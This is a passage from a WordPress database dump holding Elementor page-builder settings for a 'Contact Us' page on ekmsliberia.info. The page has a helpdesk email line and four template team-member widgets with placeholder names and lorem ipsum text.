:{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbb4b9d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"479b2af\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f229191\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14544,2307,'_elementor_edit_mode','builder'),(14545,2307,'_elementor_template_type','wp-page'),(14546,2307,'_elementor_version','2.7.5'),(14547,2307,'_wp_page_template','default'),(14548,2307,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2300,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-13.jpg\"},\"member_first_name\":\"John\",\"member_last_name\":\"Borthwick\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"Mary\",\"member_last_name\":\"Scott\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14550,2308,'_elementor_edit_mode','builder'),(14551,2308,'_elementor_template_type','wp-page'),(14552,2308,'_elementor_version','2.7.5'),(14553,2308,'_wp_page_template','default'),(14554,2308,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please 